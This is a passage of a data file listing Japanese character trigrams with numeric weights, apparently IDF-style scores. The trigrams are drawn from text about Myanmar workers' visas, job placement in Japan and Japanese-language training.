('を通じ', 0.227084),
('を運営', 0.30103),
('を選ぶ', 0.30103),
('を重ね', 0.30103),
('を開い', 0.30103),
('を開け', 0.30103),
('を開始', 0.0748405),
('を開設', 0.30103),
('を除く', 0.268975),
('を雇用', 0.30103),
('んが日', 0.30103),
('んでい', 0.30103),
('んでお', 0.210874),
('んでく', 0.0791812),
('んとし', 0.30103),
('んと行', 0.30103),
('んなの', 0.30103),
('んな仕', 0.30103),
('ァイリ', 0.188306),
('ァミリ', 0.30103),
('アに関', 0.30103),
('アのポ', 0.01524),
('アを緊', 0.124939),
('アウン', 0.0667875),
('アクセ', 0.30103),
('アクテ', 0.30103),
('アシス', 0.30103),
('アデザ', 0.30103),
('アドバ', 0.30103),
('アドミ', 0.30103),
('アブダ', 0.01524),
('アプロ', 0.176091),
('アント', 0.150332),
('ィカレ', 0.30103),
('ィスの', 0.184747),
('ィッ建', 0.30103),
('ィネー', 0.30103),
('ィブな', 0.30103),
('ィブス', 0.19672),
('ィブ講', 0.30103),
('ィング', 0.0154858),
('ィン建', 0.30103),
('ィーコ', 0.061657),
('ィー建', 0.30103),
('ィ地域', 0.30103),
('ィ地方', 0.205015),
('イまた', 0.01524),
('イアン', 0.150295),
('イク造', 0.0579919),
('イゴの', 0.30103),
('イスを', 0.30103),
('イズさ', 0.09691),
('イティ', 0.107318),
('イトを', 0.30103),
('イビザ', 0.30103),
('イメー', 0.30103),
('イリン', 0.18853),
('イルは', 0.30103),
('インと', 0.30103),
('インの', 0.30103),
('イング', 0.30103),
('インス', 0.176091),
('インタ', 0.0107239),
('インテ', 0.30103),
('インビ', 0.30103),
('イン地', 0.30103),
('イン大', 0.30103),
('イ湾岸', 0.212661),
('イ語学', 0.30103),
('ウィン', 0.30103),
('ウェブ', 0.00796893),
('ウビン', 0.30103),
('ウンネ', 0.30103),
('ェクト', 0.0870897),
('ェタゴ', 0.30103),
('ェッシ', 0.30103),
('ェピー', 0.30103),
('ェブサ', 0.00796893),
('ェリー', 0.30103),
('ェンシ', 0.013943),
('エチケ', 0.30103),
('エンジ', 0.0130886),
('エージ', 0.013943),
('エーヤ', 0.205015),
('ォンコ', 0.0751326),
('オを通', 0.30103),
('オフィ', 0.133771),
('オペレ', 0.30103),
('オート', 0.0768165),
('カイゴ', 0.30103),
('カスタ', 0.09691),
('カテゴ', 0.184747),
('カレッ', 0.30103),
('カーが', 0.30103),
('カーと', 0.30103),
('カーの', 0.30103),
('カード', 0.30103),
('ガイン', 0.128392),
('ガポー', 0.00741121),
('ガレ工', 0.30103),
('キッチ', 0.30103),
('キルと', 0.30103),
('キルを', 0.157388),
('キルテ', 0.124939),
('キング', 0.0212455),
('クで仕', 0.30103),
('クを扱', 0.30103),
('クショ', 0.017235),
('クスを', 0.30103),
('クセン', 0.30103),
('クター', 0.176091),
('クティ', 0.30103),
('クテイ', 0.30103),
('クトが', 0.30103),
('クトに', 0.30103),
('クトは', 0.30103),
('クトを', 0.30103),
('クト協', 0.30103),
('クパー', 0.30103),
('クビザ', 0.273082),
('クライ', 0.150219),
('クラス', 0.00353743),
('ク造船', 0.0579919),
('グでで', 0.30103),
('グと実', 0.0222764),
('グと準', 0.30103),
('グなど', 0.189564),
('グのシ', 0.30103),
('グを提', 0.30103),
('グクラ', 0.30103),
('グビザ', 0.279375),
('グルー', 0.082862),
('グ校と', 0.30103),
('グ海外', 0.107844),
('ケジュ', 0.263715),
('ケット', 0.30103),
('ケーシ', 0.232357),
('ケース', 0.30103),
('コスト', 0.30103),
('コミュ', 0.150407),
('コメッ', 0.00384955),
('コンサ', 0.30103),
('コンス', 0.017235),
('コント', 0.30103),
('コンピ', 0.161207),
('コース', 0.0329957),
('コーデ', 0.30103),
('ゴの子', 0.30103),
('ゴリー', 0.184747),
('ゴンの', 0.30103),
('ゴンテ', 0.30103),
('ゴン地', 0.30103),
('サイト', 0.00796893),
('サガイ', 0.30103),
('サビー', 0.30103),
('サポー', 0.0559198),
('サルタ', 0.30103),
('サルー', 0.30103),
('サービ', 0.0326853),
('ザであ', 0.142559),
('ザです', 0.0533992),
('ザでミ', 0.30103),
('ザで日', 0.30103),
('ザで韓', 0.30103),
('ザなど', 0.30103),
('ザにつ', 0.129001),
('ザの貴', 0.30103),
('ザは外', 0.0147803),
('ザは溶', 0.30103),
('ザや研', 0.30103),
('ザを取', 0.228405),
('ザを持', 0.01524),
('ザイン', 0.30103),
('ザガイ', 0.143169),
('ザポジ', 0.124939),
('ザ保持', 0.26158),
('シェピ', 0.30103),
('シスタ', 0.30103),
('シップ', 0.0184834),
('シナリ', 0.30103),
('シュエ', 0.061657),
('ショナ', 0.30103),
('ション', 0.00643869),
('シンガ', 0.00741057),
('シンマ', 0.0478333),
('シーで', 0.0846748),
('シーは', 0.155451),
('シーを', 0.202653),
('シーム', 0.30103),
('ジの学', 0.30103),
('ジェク', 0.0870534),
('ジェン', 0.013943),
('ジショ', 0.0457575),
('ジニア', 0.0130901),
('ジネス', 0.207623),
('ジホス', 0.124939),
('ジュー', 0.263989),
('スがお', 0.09691),
('スが本', 0.30103),
('スでは', 0.30103),
('スとサ', 0.0768165),
('スと日', 0.124939),
('スな体', 0.30103),
('スには', 0.00998422),
('スの仕', 0.184747),
('スの受', 0.0147233),
('スの提', 0.30103),
('スの教', 0.124939),
('スの詳', 0.141899),
('スもあ', 0.30103),
('スも自', 0.30103),
('スや様', 0.30103),
('スや機', 0.30103),
('スをし', 0.222923),
('スを手', 0.30103),
('スを掴', 0.0871887),
('スを提', 0.218377),
('スを緊', 0.124939),
('スキル', 0.0645612),
('スケジ', 0.263439),
('スタイ', 0.30103),
('スタマ', 0.09691),
('スタン', 0.130078),
('スター', 0.0958124),
('ステス', 0.124939),
('ストの', 0.124939),
('ストラ', 0.00330073),
('スト削', 0.30103),
('スピー', 0.0139366),
('スポー', 0.0147869),
('スマー', 0.30103),
('スンは', 0.30103),
('ス修了', 0.146297),
('ス教材', 0.269495),
('ス株式', 0.124913),
('ス業に', 0.184747),
('ス終了', 0.0222764),
('ス表現', 0.30103),
('ズされ', 0.09691),
('センタ', 0.251562),
('セント', 0.30103),
('セール', 0.0768165),
('ゼッヤ', 0.30103),
('ゼヤー', 0.0354867),
('ゼーヤ', 0.30103),
('ソコン', 0.30103),
('ソリュ', 0.30103),
('タイル', 0.30103),
('タイ語', 0.30103),
('タゴン', 0.30103),
('タマイ', 0.09691),
('タンダ', 0.176091),
('タント', 0.225212),
('ターが', 0.30103),
('ターし', 0.30103),
('ターす', 0.30103),
('ターの', 0.220409),
('ターは', 0.30103),
('ターを', 0.188306),
('ターン', 0.0107239),
('ター学', 0.30103),
('ター文', 0.30103),
('ター聴', 0.275892),
('ター読', 0.275396),
('タ入力', 0.188306),
('ダナポ', 0.30103),
('ダビの', 0.01524),
('ダレー', 0.24118),
('ダーシ', 0.30103),
('ダード', 0.176091),
('チから', 0.01524),
('チでは', 0.30103),
('チによ', 0.30103),
('チのス', 0.0222764),
('チの初', 0.30103),
('チの学', 0.30103),
('チを行', 0.0579919),
('チェタ', 0.30103),
('チケッ', 0.30103),
('チベー', 0.30103),
('チャッ', 0.30103),
('チャレ', 0.30103),
('チャン', 0.0803027),
('チンで', 0.30103),
('チ実習', 0.0222764),
('ックや', 0.30103),
('ックを', 0.30103),
('ッショ', 0.0122345),
('ッジの', 0.30103),
('ッジホ', 0.124939),
('ッスン', 0.30103),
('ッチか', 0.01524),
('ッチの', 0.0202364),
('ッチン', 0.30103),
('ッチ実', 0.0222764),
('ットに', 0.30103),
('ットは', 0.30103),
('ットを', 0.30103),
('ットエ', 0.0947281),
('ットト', 0.107844),
('ットワ', 0.30103),
('ット商', 0.00755314),
('ット建', 0.30103),
('ット自', 0.30103),
('ップで', 0.30103),
('ップの', 0.30103),
('ップは', 0.30103),
('ッヤシ', 0.30103),
('ッ建設', 0.30103),
('ティカ', 0.30103),
('ティッ', 0.30103),
('ティブ', 0.0896422),
('ティー', 0.30103),
('テイビ', 0.30103),
('テゴリ', 0.184747),
('テスを', 0.124939),
('テスト', 0.124939),
('テリア', 0.30103),
('テルで', 0.01524),
('テル関', 0.30103),
('ディネ', 0.30103),
('ディン', 0.0154858),
('ディ地', 0.174361),
('デザイ', 0.30103),
('データ', 0.188306),
('トから', 0.30103),
('トが実', 0.30103),
('トして', 0.154175),
('トしま', 0.30103),
('トする', 0.207975),
('トだけ', 0.30103),
('トと候', 0.30103),
('トな振', 0.30103),
('トにお', 0.30103),
('トに合', 0.30103),
('トに従', 0.30103),
('トの受', 0.124939),
('トは以', 0.30103),
('トや候', 0.30103),
('トをお', 0.30103),
('トを代', 0.30103),
('トを建', 0.30103),
('トを持', 0.01524),
('トを練', 0.30103),
('トアシ', 0.30103),
('トエー', 0.0947281),
('トクテ', 0.30103),
('トセー', 0.0768165),
('トトレ', 0.107844),
('トナー', 0.30103),
('トピッ', 0.30103),
('トラク', 0.0159675),
('トラッ', 0.253627),
('トラン', 0.00414118),
('トレン', 0.12106),
('トレー', 0.0154634),
('トワー', 0.30103),
('ト作成', 0.30103),
('ト削減', 0.30103),
('ト協力', 0.30103),
('ト商社', 0.00755314),
('ト建築', 0.30103),
('ト的で', 0.30103),
('ト自動', 0.30103),
('ドに負', 0.176091),
('ドを持', 0.30103),
('ドバイ', 0.0141863),
('ドマス', 0.271187),
('ドミン', 0.30103),
('ドー職', 0.30103),
('ドー連', 0.30103),
('ナポン', 0.30103),
('ナリオ', 0.30103),
('ナルの', 0.30103),
('ナーと', 0.30103),
('ニアに', 0.30103),
('ニアの', 0.01524),
('ニアを', 0.124939),
('ニケー', 0.232268),
('ニティ', 0.30103),
('ニュー', 0.00363723),
('ニング', 0.0940882),
('ネイテ', 0.107243),
('ネスも', 0.30103),
('ネス表', 0.30103),
('ネット', 0.30103),
('ネピド', 0.243054),
('ネーウ', 0.30103),
('ネータ', 0.30103),
('バイま', 0.01524),
('バイス', 0.30103),
('バスや', 0.30103),
('バッチ', 0.00634342),
('バレッ', 0.124939),
('パスポ', 0.0147852),
('パソコ', 0.30103),
('パート', 0.30103),
('パーミ', 0.30103),
('ビザで', 0.0295429),
('ビザな', 0.30103),
('ビザに', 0.128664),
('ビザの', 0.30103),
('ビザは', 0.0144326),
('ビザや', 0.30103),
('ビザを', 0.014504),
('ビザポ', 0.124939),
('ビザ保', 0.261305),
('ビジネ', 0.207241),
('ビスの', 0.30103),
('ビスや', 0.30103),
('ビスを', 0.30103),
('ビス株', 0.124913),
('ビス業', 0.184747),
('ビバレ', 0.124939),
('ビュー', 0.0263289),
('ビルダ', 0.30103),
('ビルマ', 0.30103),
('ビース', 0.30103),
('ピィー', 0.061657),
('ピック', 0.30103),
('ピドー', 0.243594),
('ピュー', 0.161279),
('ピーカ', 0.143127),
('ピーキ', 0.0212455),
('ピーチ', 0.0579919),
('ピーテ', 0.30103),
('ピード', 0.270701),
('ファイ', 0.188306),
('ファミ', 0.30103),
('フィス', 0.133907),
('フェッ', 0.30103),
('フェリ', 0.30103),
('フード', 0.124939),
('ブな方', 0.30103),
('ブサイ', 0.00796893),
('ブスピ', 0.19672),
('ブダビ', 0.01524),
('ブ講師', 0.30103),
('プでは', 0.30103),
('プのイ', 0.30103),
('プの一', 0.195659),
('プレイ', 0.30103),
('プロジ', 0.0869804),
('プロフ', 0.30103),
('プロー', 0.176091),
('プ企業', 0.30103),
('プ活動', 0.176091),
('ベーシ', 0.30103),
('ペレー', 0.30103),
('ホステ', 0.124939),
('ホテル', 0.0149271),
('ボガレ', 0.30103),
('ポジシ', 0.0457575),
('ポン大', 0.30103),
('ポート', 0.0118576),
('ポール', 0.0129269),
('マイズ', 0.09691),
('マウビ', 0.30103),
('マスタ', 0.0957351),
('マライ', 0.0478483),
('マレー', 0.278261),
('マンダ', 0.240075),
('マーの', 0.166704),
('マーを', 0.30103),
('マート', 0.30103),
('マー全', 0.207094),
('マ語で', 0.30103),
('ミッシ', 0.0125891),
('ミット', 0.30103),
('ミャイ', 0.30103),
('ミャワ', 0.30103),
('ミャン', 0.0692604),
('ミュニ', 0.150444),
('ミリー', 0.30103),
('ミンサ', 0.30103),
('ムレス', 0.30103),
('メット', 0.00384965),
('メージ', 0.30103),
('モチベ', 0.30103),
('モーラ', 0.30103),
('ャイン', 0.30103),
('ャット', 0.30103),
('ャレン', 0.30103),
('ャワデ', 0.30103),
('ャンス', 0.0803289),
('ャンマ', 0.0692974),
('ヤシェ', 0.30103),
('ヤダナ', 0.30103),
('ヤンゴ', 0.0211893),
('ヤーシ', 0.0781583),
('ヤーニ', 0.30103),
('ヤーワ', 0.205015),
('ュニケ', 0.232179),
('ュニテ', 0.30103),
('ューコ', 0.00616298),
('ューシ', 0.30103),
('ュータ', 0.161314),
('ュール', 0.264263),
('ョナル', 0.30103),
('ョンが', 0.124939),
('ョンで', 0.0629476),
('ョンを', 0.236722),
('ョンコ', 0.30103),
('ョン株', 0.021029),
('ョン能', 0.30103),
('ライア', 0.150257),
('ライク', 0.0579919),
('ライ湾', 0.212512),
('ラクシ', 0.017235),
('ラクス', 0.124939),
('ラクタ', 0.176091),
('ラスが', 0.30103),
('ラスで', 0.30103),
('ラスに', 0.00998422),
('ラスの', 0.0135357),
('ラスを', 0.278445),
('ラス修', 0.30103),
('ラス終', 0.0222764),
('ラック', 0.25425),
('ラミャ', 0.30103),
('ランで', 0.0170333),
('ランの', 0.176091),
('ランイ', 0.0222764),
('ラン実', 0.0222764),
('ラン部', 0.30103),
('リアデ', 0.30103),
('リオを', 0.30103),
('リュー', 0.30103),
('リング', 0.188876),
('リーに', 0.151684),
('リーを', 0.30103),
('リーダ', 0.30103),
('リーデ', 0.30103),
('ルで働', 0.124939),
('ルで緊', 0.124939),
('ルと関', 0.30103),
('ルの建', 0.124939),
('ルの指', 0.30103),
('ルを持', 0.30103),
('ルを理', 0.30103),
('ルを磨', 0.30103),
('ルを育', 0.30103),
('ルスと', 0.0768165),
('ルタン', 0.30103),
('ルダー', 0.30103),
('ルテス', 0.124939),
('ルドル', 0.30103),
('ルプレ', 0.30103),
('ルマ語', 0.30103),
('ループ', 0.082862),
('ルール', 0.30103),
('ルーン', 0.30103),
('ル関係', 0.30103),
('レイン', 0.30103),
('レスな', 0.30103),
('レスト', 0.00414106),
('レッジ', 0.09691),
('レッス', 0.30103),
('レンジ', 0.30103),
('レンデ', 0.12106),
('レーシ', 0.168398),
('レーデ', 0.0181458),
('レーニ', 0.0938526),
('レー地', 0.30103),
('レ工科', 0.30103),
('ロジェ', 0.087017),
('ロフェ', 0.30103),
('ローチ', 0.176091),
('ロール', 0.30103),
('ローン', 0.30103),
('ワォン', 0.0751326),
('ワディ', 0.174361),
('ワーク', 0.142692),
('ンが切', 0.124939),
('ンでの', 0.0212007),
('ンで働', 0.09691),
('ンで優', 0.30103),
('ンで実', 0.30103),
('ンで韓', 0.124939),
('ンで食', 0.30103),
('ンとい', 0.30103),
('ンのプ', 0.30103),
('ンの有', 0.30103),
('ンの面', 0.176091),
('ンを受', 0.30103),
('ンを感', 0.30103),
('ンを提', 0.30103),
('ンイン', 0.0222764),
('ンガポ', 0.00741089),
('ングで', 0.30103),
('ングと', 0.021451),
('ングな', 0.189221),
('ングの', 0.30103),
('ングを', 0.30103),
('ングク', 0.30103),
('ングビ', 0.278857),
('ング校', 0.30103),
('ング海', 0.107844),
('ンコン', 0.0751326),
('ンコー', 0.30103),
('ンゴン', 0.0211893),
('ンサポ', 0.30103),
('ンサル', 0.30103),
('ンシッ', 0.0193052),
('ンシー', 0.013943),
('ンジニ', 0.0130893),
('ンスを', 0.080355),
('ンスト', 0.0159675),
('ンター', 0.0103973),
('ンダレ', 0.240629),
('ンダー', 0.176091),
('ンティ', 0.30103),
('ンテリ', 0.30103),
('ンディ', 0.12106),
('ントか', 0.30103),
('ントと', 0.30103),
('ントや', 0.30103),
('ントを', 0.30103),
('ントレ', 0.30103),
('ンネー', 0.30103),
('ンビル', 0.30103),
('ンピュ', 0.161243),
('ンマラ', 0.0478408),
('ンマー', 0.0693343),
('ン地方', 0.177189),
('ン大学', 0.272283),
('ン実習', 0.0222764),
('ン建築', 0.30103),
('ン株式', 0.021029),
('ン能力', 0.30103),
('ン自動', 0.30103),
('ン部門', 0.30103),
('ヶ月か', 0.30103),
('ーが日', 0.30103),
('ーした', 0.30103),
('ーする', 0.30103),
('ーでは', 0.0847033),
('ーとな', 0.30103),
('ーと経', 0.30103),
('ーに分', 0.184747),
('ーに参', 0.30103),
('ーのた', 0.30103),
('ーのフ', 0.30103),
('ーの両', 0.30103),
('ーの教', 0.30103),
('ーの現', 0.30103),
('ーの若', 0.30103),
('ーは言', 0.30103),
('ーをサ', 0.30103),
('ーを使', 0.188306),
('ーを信', 0.30103),
('ーを出', 0.30103),
('ーを設', 0.30103),
('ーウィ', 0.30103),
('ーカー', 0.143259),
('ーキン', 0.0212455),
('ークで', 0.30103),
('ークパ', 0.30103),
('ークビ', 0.27258),
('ーコメ', 0.00616324),
('ーコン', 0.061657),
('ーシア', 0.279208),
('ーシッ', 0.30103),
('ーシュ', 0.0783077),
('ーショ', 0.101434),
('ージェ', 0.013943),
('ースが', 0.09691),
('ースと', 0.124939),
('ースの', 0.124939),
('ースも', 0.30103),
('ースを', 0.30103),
('ース修', 0.221697),
('ース教', 0.269235),
('ーター', 0.117376),
('ータ入', 0.188306),
('ーダー', 0.30103),
('ーチで', 0.30103),
('ーチに', 0.30103),
('ーチを', 0.0579919),
('ーティ', 0.30103),
('ーディ', 0.0167462),
('ートし', 0.115859),
('ートす', 0.207392),
('ートだ', 0.30103),
('ートな', 0.30103),
('ートを', 0.01524),
('ートア', 0.30103),
('ートセ', 0.0768165),
('ートナ', 0.30103),
('ート作', 0.30103),
('ート的', 0.30103),
('ードに', 0.176091),
('ードを', 0.30103),
('ードマ', 0.270944),
('ーニュ', 0.30103),
('ーニン', 0.0939706),
('ービス', 0.0326928),
('ープの', 0.195659),
('ープ企', 0.30103),
('ープ活', 0.176091),
('ーミッ', 0.30103),
('ームレ', 0.30103),
('ーヤー', 0.138709),
('ーラミ', 0.30103),
('ールで', 0.01524),
('ールの', 0.124939),
('ールを', 0.30103),
('ールス', 0.0768165),
('ールド', 0.30103),
('ールプ', 0.30103),
('ーワデ', 0.205015),
('ーンを', 0.30103),
('ーンシ', 0.0107239),
('ーン自', 0.30103),
('ー全国', 0.207263),
('ー地方', 0.30103),
('ー学校', 0.30103),
('ー建築', 0.30103),
('ー文法', 0.30103),
('ー聴解', 0.276139),
('ー職員', 0.30103),
('ー読解', 0.275644),
('ー連合', 0.30103),
('一つで', 0.30103),
('一生懸', 0.0561356),
('一般労', 0.124939),
('一部で', 0.195659),
('一部と', 0.30103),
('一部は', 0.30103),
('丁寧に', 0.178664),
('上が残', 0.176091),
('上げま', 0.30103),
('上させ', 0.30103),
('上の人', 0.30103),
('上の合', 0.30103),
('上の学', 0.30103),
('上の方', 0.01524),
('上の経', 0.131929),
('上司の', 0.0222764),
('上手に', 0.30103),
('上記の', 0.265495),
('下で健', 0.30103),
('下で訓', 0.30103),
('下のカ', 0.184747),
('下の支', 0.30103),
('下の熟', 0.01524),
('下の通', 0.265134),
('不安を', 0.30103),
('不思議', 0.30103),
('不注意', 0.30103),
('与えら', 0.184747),
('与され', 0.30103),
('世界を', 0.30103),
('両方で', 0.30103),
('両方の', 0.30103),
('両親を', 0.30103),
('中で最', 0.30103),
('了しま', 0.30103),
('了時に', 0.30103),
('事がな', 0.30103),
('事して', 0.30103),
('事する', 0.184747),
('事であ', 0.30103),
('事で来', 0.0263289),
('事にお', 0.30103),
('事にも', 0.30103),
('事に備', 0.30103),
('事に取', 0.30103),
('事に就', 0.30103),
('事に献', 0.30103),
('事のた', 0.30103),
('事のよ', 0.09691),
('事のチ', 0.30103),
('事の一', 0.30103),
('事の依', 0.30103),
('事の機', 0.30103),
('事の紹', 0.268086),
('事は自', 0.30103),
('事やサ', 0.184747),
('事や文', 0.30103),
('事をし', 0.30103),
('事をす', 0.30103),
('事を自', 0.09691),
('事を行', 0.30103),
('事を見', 0.28635),
('事を選', 0.30103),
('事チャ', 0.30103),
('事業と', 0.30103),
('事業を', 0.153524),
('事業内', 0.0157943),
('事監督', 0.30103),
('事紹介', 0.30103),
('事終了', 0.30103),
('事項で', 0.30103),
('事項は', 0.30103),
('互尊重', 0.30103),
('交通手', 0.30103),
('交通機', 0.30103),
('交通総', 0.30103),
('交通費', 0.30103),
('京での', 0.30103),
('京の大', 0.09691),
('京へ出', 0.30103),
('京市に', 0.30103),
('人たち', 0.30103),
('人に対', 0.0147803),
('人のた', 0.124939),
('人のネ', 0.30103),
('人の姉', 0.30103),
('人の幼', 0.09691),
('人の従', 0.192339),
('人の言', 0.30103),
('人を募', 0.176091),
('人事業', 0.30103),
('人以上', 0.0148887),
('人住宅', 0.30103),
('人数制', 0.30103),
('人材紹', 0.30103),
('人船員', 0.30103),
('今すぐ', 0.30103),
('今後も', 0.30103),
('介に成', 0.30103),
('介をし', 0.30103),
('介を行', 0.269269),
('介護の', 0.30103),
('介護ビ', 0.30103),
('介護施', 0.30103),
('介護職', 0.30103),
('介護関', 0.256486),
('仕事で', 0.025335),
('仕事に', 0.0825913),
('仕事の', 0.0473716),
('仕事や', 0.129203),
('仕事を', 0.0578705),
('仕事チ', 0.30103),
('仕事紹', 0.30103),
('仕入れ', 0.30103),
('他の共', 0.30103),
('他の周', 0.30103),
('他国内', 0.30103),
('付けて', 0.09691),
('付ける', 0.30103),
('代表し', 0.30103),
('以上が', 0.176091),
('以上の', 0.0128868),
('以下で', 0.30103),
('以下の', 0.0133333),
('以内に', 0.30103),
('以来サ', 0.30103),
('以降に', 0.30103),
('件はあ', 0.30103),
('件を提', 0.30103),
('企業の', 0.30103),
('休暇が', 0.176091),
('会があ', 0.30103),
('会です', 0.30103),
('会と健', 0.30103),
('会につ', 0.30103),
('会をお', 0.30103),
('会をで', 0.30103),
('会を提', 0.30103),
('会を最', 0.30103),
('会社で', 0.30103),
('会社と', 0.193692),
('会社に', 0.30103),
('会社の', 0.0051117),
('会社は', 0.161872),
('会社も', 0.30103),
('会社を', 0.30103),
('会社情', 0.0157943),
('会社沿', 0.0157943),
('会社登', 0.184298),
('会話ク', 0.30103),
('会話力', 0.30103),
('会話方', 0.30103),
('伝いが', 0.30103),
('伝いし', 0.09691),
('伝えし', 0.100318),
('伝えて', 0.30103),
('伝統に', 0.134378),
('位があ', 0.30103),
('位と経', 0.30103),
('位に立', 0.30103),
('位保持', 0.30103),
('住する', 0.30103),
('住宅な', 0.30103),
('住宅を', 0.278101),
('住宅プ', 0.228882),
('住宅建', 0.30103),
('体系的', 0.30103),
('体験を', 0.30103),
('何か質', 0.30103),
('何事に', 0.30103),
('作成サ', 0.30103),
('作業員', 0.30103),
('使える', 0.30103),
('使った', 0.188306),
('使われ', 0.30103),
('使用を', 0.30103),
('供させ', 0.30103),
('供して', 0.0964683),
('供しま', 0.30103),
('供する', 0.0974217),
('供たち', 0.30103),
('供を行', 0.30103),
('依頼と', 0.30103),
('価され', 0.30103),
('価格の', 0.30103),
('価結果', 0.124939),
('係の工', 0.30103),
('係を築', 0.30103),
('促進し', 0.30103),
('促進す', 0.30103),
('保ちな', 0.30103),
('保持者', 0.172283),
('保証し', 0.30103),
('信して', 0.30103),
('信じて', 0.182335),
('信を持', 0.30103),
('信省の', 0.0579919),
('信頼し', 0.203209),
('信頼で', 0.30103),
('修に参', 0.30103),
('修に合', 0.30103),
('修をし', 0.30103),
('修ビザ', 0.30103),
('修了後', 0.30103),
('修了時', 0.30103),
('修理関', 0.30103),
('修生た', 0.0579919),
('修生に', 0.124939),
('修生を', 0.30103),
('修生達', 0.0137883),
('修繕工', 0.30103),
('個人事', 0.30103),
('個人住', 0.30103),
('倍とな', 0.30103),
('候補者', 0.124939),
('健康で', 0.19095),
('健康と', 0.30103),
('健康に', 0.09691),
('健康を', 0.176091),
('健康保', 0.176091),
('側担当', 0.01524),
('備えま', 0.30103),
('備がで', 0.30103),
('備が成', 0.30103),
('備をし', 0.30103),
('働いて', 0.30103),
('働きた', 0.0372475),
('働きま', 0.30103),
('働き専', 0.30103),
('働くた', 0.176091),
('働くよ', 0.30103),
('働くフ', 0.124939),
('働く必', 0.30103),
('働く方', 0.185296),
('働時間', 0.30103),
('働者と', 0.106795),
('働者に', 0.30103),
('働者の', 0.30103),
('働者は', 0.150171),
('働者を', 0.01524),
('儀正し', 0.30103),
('優位に', 0.30103),
('優先事', 0.198576),
('優秀な', 0.09691),
('元で練', 0.30103),
('元従業', 0.30103),
('先事項', 0.199028),
('先生が', 0.30103),
('先生と', 0.30103),
('先生達', 0.30103),
('先祖を', 0.30103),
('先輩を', 0.30103),
('克服す', 0.30103),
('入から', 0.176091),
('入して', 0.30103),
('入れる', 0.30103),
('入許可', 0.245478),
('入販売', 0.30103),
('全な旅', 0.30103),
('全に減', 0.30103),
('全国か', 0.207431),
('共同語', 0.30103),
('内に仕', 0.30103),
('内に新', 0.30103),
('内外の', 0.30103),
('内容が', 0.124939),
('出まし', 0.30103),
('出発お', 0.0791812),
('出発し', 0.124939),
('出発す', 0.30103),
('出迎え', 0.0579919),
('分から', 0.265887),
('分けら', 0.184747),
('分です', 0.30103),
('分な睡', 0.30103),
('分な経', 0.30103),
('分にご', 0.30103),
('分に合', 0.30103),
('分の仕', 0.0846172),
('分らし', 0.30103),
('分野で', 0.0864527),
('分野の', 0.184747),
('切です', 0.30103),
('切な語', 0.30103),
('切に仕', 0.30103),
('切実に', 0.124939),
('初にお', 0.30103),
('初めて', 0.0579919),
('初回ク', 0.30103),
('初心者', 0.0892504),
('別なビ', 0.0994485),
('到着し', 0.30103),
('到着後', 0.30103),
('制の会', 0.30103),
('削減ソ', 0.30103),
('前サー', 0.30103),
('前向き', 0.30103),
('副大臣', 0.0579919),
('割を今', 0.30103),
('力して', 0.122705),
('力でク', 0.30103),
('力に自', 0.30103),
('力のあ', 0.30103),
('力のも', 0.01524),
('力の高', 0.14952),
('力をマ', 0.30103),
('力を向', 0.30103),
('力を持', 0.0147803),
('力を磨', 0.30103),
('力工学', 0.30103),
('力試験', 0.195911),
('功した', 0.30103),
('功して', 0.30103),
('功し続', 0.30103),
('功と健', 0.30103),
('功のた', 0.30103),
('加えて', 0.30103),
('加すべ', 0.00998422),
('加する', 0.30103),
('努めて', 0.30103),
('励して', 0.30103),
('励まし', 0.30103),
('労働時', 0.30103),
('労働者', 0.0120443),
('効果的', 0.30103),
('勉さと', 0.30103),
('勉強す', 0.30103),
('勉強で', 0.30103),
('動に加', 0.30103),
('動やキ', 0.30103),
('動や筆', 0.30103),
('動車の', 0.30103),
('動車商', 0.30103),
('動車売', 0.30103),
('動車販', 0.30103),
('務まで', 0.30103),
('務を促', 0.30103),
('務時間', 0.0791812),
('務研修', 0.30103),
('務経験', 0.30103),
('募を奨', 0.30103),
('募者を', 0.30103),
('募集し', 0.0619631),
('勢を見', 0.30103),
('勤める', 0.190715),
('勤勉さ', 0.30103),
('勤務時', 0.0791812),
('勤務経', 0.30103),
('包括的', 0.183954),
('化され', 0.30103),
('化など', 0.30103),
('化や伝', 0.30103),
('化を理', 0.0791812),
('北海道', 0.176091),
('区の基', 0.30103),
('十分だ', 0.30103),
('十分で', 0.30103),
('十分な', 0.192567),
('十分に', 0.30103),
('卒業し', 0.178372),
('卒業生', 0.30103),
('卓越し', 0.17689),
('協力し', 0.30103),
('協力の', 0.01524),
('占的な', 0.0147233),
('厨房に', 0.30103),
('厨房業', 0.30103),
('厳を学', 0.30103),
('厳守し', 0.0791812),
('去には', 0.30103),
('参りま', 0.232534),
('参加し', 0.30103),
('参加す', 0.00975984),
('収入か', 0.176091),
('取り合', 0.30103),
('取り巻', 0.30103),
('取り組', 0.124939),
('取り込', 0.30103),
('取得お', 0.0280287),
('取得し', 0.176091),
('取得す', 0.30103),
('受けた', 0.30103),
('受けて', 0.30103),
('受けま', 0.30103),
('受ける', 0.0740856),
('受け取', 0.30103),
('受講の', 0.09691),
('受験登', 0.124939),
('可を多', 0.30103),
('可を得', 0.30103),
('可能性', 0.0927228),
('可証の', 0.30103),
('号また', 0.30103),
('司の待', 0.0222764),
('司レス', 0.0222764),
('司料理', 0.30103),
('各種サ', 0.30103),
('各種バ', 0.30103),
('各種商', 0.30103),
('各種機', 0.30103),
('合いま', 0.30103),
('合った', 0.178557),
('合でも', 0.30103),
('合に応', 0.30103),
('合わせ', 0.0148858),
('合マス', 0.204979),
('合格お', 0.0202034),
('合格し', 0.0136861),
('合格す', 0.17689),
('合格で', 0.30103),
('合格を', 0.0222764),
('合格者', 0.150208),
('合領土', 0.30103),
('同じス', 0.30103),
('同社は', 0.30103),
('同行中', 0.30103),
('同語学', 0.30103),
('名だた', 0.30103),
('名レス', 0.30103),
('名法か', 0.30103),
('名義で', 0.30103),
('向きな', 0.30103),
('向けた', 0.30103),
('向けに', 0.30103),
('向けの', 0.188543),
('向けレ', 0.0222764),
('向上さ', 0.30103),
('周辺都', 0.30103),
('味を持', 0.30103),
('命に取', 0.30103),
('命働き', 0.25569),
('命働く', 0.30103),
('命勉強', 0.30103),
('命名法', 0.30103),
('品サー', 0.30103),
('品製造', 0.30103),
('品関係', 0.30103),
('員がい', 0.30103),
('員に同', 0.30103),
('員の名', 0.30103),
('員を雇', 0.30103),
('員住宅', 0.30103),
('員向け', 0.30103),
('商業建', 0.30103),
('商用ト', 0.30103),
('商社は', 0.30103),
('商社株', 0.00755314),
('問いた', 0.30103),
('問い合', 0.01524),
('問やお', 0.30103),
('問わず', 0.20892),
('問題あ', 0.30103),
('問題で', 0.30103),
('問題な', 0.30103),
('問題を', 0.30103),
('善を尽', 0.30103),
('善事業', 0.30103),
('喜びで', 0.30103),
